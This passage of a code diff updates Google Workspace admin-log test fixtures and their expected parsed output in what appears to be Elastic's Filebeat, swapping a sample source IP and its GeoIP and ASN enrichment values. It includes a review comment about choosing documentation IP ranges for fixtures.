@@ -495,27 +463,23 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 3364, + "log.offset": 3356, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo", "user" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -541,7 +505,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBER_BULK_UPLOAD\",\"parameters\":[{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER\",\"value\":\"0\"},{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER\",\"value\":\"10\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBER_BULK_UPLOAD\",\"parameters\":[{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER\",\"value\":\"0\"},{\"name\":\"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER\",\"value\":\"10\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -555,26 +519,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 3906, + "log.offset": 3897, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -595,7 +555,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBERS_DOWNLOAD\"}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_MEMBERS_DOWNLOAD\"}}", "event.provider": "admin", "event.type": [ "group", 
@@ -607,26 +567,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 4370, + "log.offset": 4360, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -647,7 +603,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_NAME\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_NAME\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -663,26 +619,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 4693, + "log.offset": 4682, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -703,7 +655,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_SETTING\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_SETTING\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -721,26 +673,22 @@ "group.domain": "example.com", "group.name": "group", "input.type": "log", - "log.offset": 5112, + "log.offset": 5100, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -761,7 +709,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"WHITELISTED_GROUPS_UPDATED\",\"parameters\":[{\"name\":\"WHITELISTED_GROUPS\",\"value\":\"a,b,c\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"WHITELISTED_GROUPS_UPDATED\",\"parameters\":[{\"name\":\"WHITELISTED_GROUPS\",\"value\":\"a,b,c\"}]}}", "event.provider": "admin", "event.type": [ "change", 
@@ -778,26 +726,22 @@ "google_workspace.kind": "admin#reports#activity", "google_workspace.organization.domain": "elastic.com", "input.type": "log", - "log.offset": 5611, + "log.offset": 5598, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log index c028ff6ba1cb..a240d727301b 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log 
@@ -1,8 +1,8 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_ALL_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"CHANGE_LICENSE_AUTO_ASSIGN","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"SKU_NAME","value":"sku"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"ORG_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"LICENSES_SETTINGS","name":"UPDATE_DYNAMIC_LICENSE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_ALL_USERS_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_ASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"CHANGE_LICENSE_AUTO_ASSIGN","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"SKU_NAME","value":"sku"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REASSIGNMENT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"ORG_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"USER_LICENSE_REVOKE","parameters":[{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"PRODUCT_NAME","value":"product"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"LICENSES_SETTINGS","name":"UPDATE_DYNAMIC_LICENSE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"PRODUCT_NAME","value":"product"}]}}
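Review bot: The replacement address 67.43.156.13 in the new `ipAddress` values is still an ordinary publicly routable IP rather than one of the RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), so the fixture continues to embed an address that belongs to some real network. The paired `-expected.json` hunks in this file section and the preceding one now pin the `source.as.number` and `source.geo.*` enrichment results for that address, which come from whichever GeoIP/ASN database the test run bundles and can drift when that database is refreshed. If the address was chosen deliberately because it must resolve in the test GeoIP database, a short comment alongside the fixture or in the PR description stating that, e.g. `67.43.156.13 is used in test fixtures because it resolves in the bundled GeoIP test DB; do not replace with an RFC 5737 address`, would stop the next contributor from "fixing" it; otherwise a reserved documentation address avoids both the third-party attribution and the database-drift issue.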
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json index c4dd9cdd54cc..dfe8f63bfed5 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-licenses-test.json.log-expected.json @@ -8,7 +8,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -25,23 +25,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -62,7 +58,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_ALL_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"ORG_ALL_USERS_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -76,26 +72,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 463,
+ "log.offset": 462,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -116,7 +108,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"LICENSES_SETTINGS\",\"name\":\"USER_LICENSE_ASSIGNMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"product\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -130,27 +122,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 930,
+ "log.offset": 928,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
